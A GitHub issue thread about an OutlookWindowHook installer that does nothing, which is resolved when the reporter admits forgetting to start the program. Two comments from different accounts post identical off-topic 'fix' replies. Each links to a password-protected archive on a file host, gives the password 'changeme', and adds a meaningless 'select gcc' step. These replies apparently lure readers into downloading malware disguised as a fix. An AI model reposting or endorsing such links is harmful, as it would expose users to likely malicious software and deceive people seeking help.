### ISSUE TITLE
Installer not working

### ISSUE THREAD

**Issue by Ziedge** [Palsternakka/OutlookWindowHook#2]
I first tried the installer (.msi), it did nothing at all.
Standalone works very well however !

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ehsan18t** [comment]
After install, you have to start it manually and set for auto start. Have you tried that?

**Comment by Ziedge** [comment]
I was so exausted when I tried it that I forgot to start it...
Anyways it's working with the standalone version !
Thanks and sorry for the useless trouble !
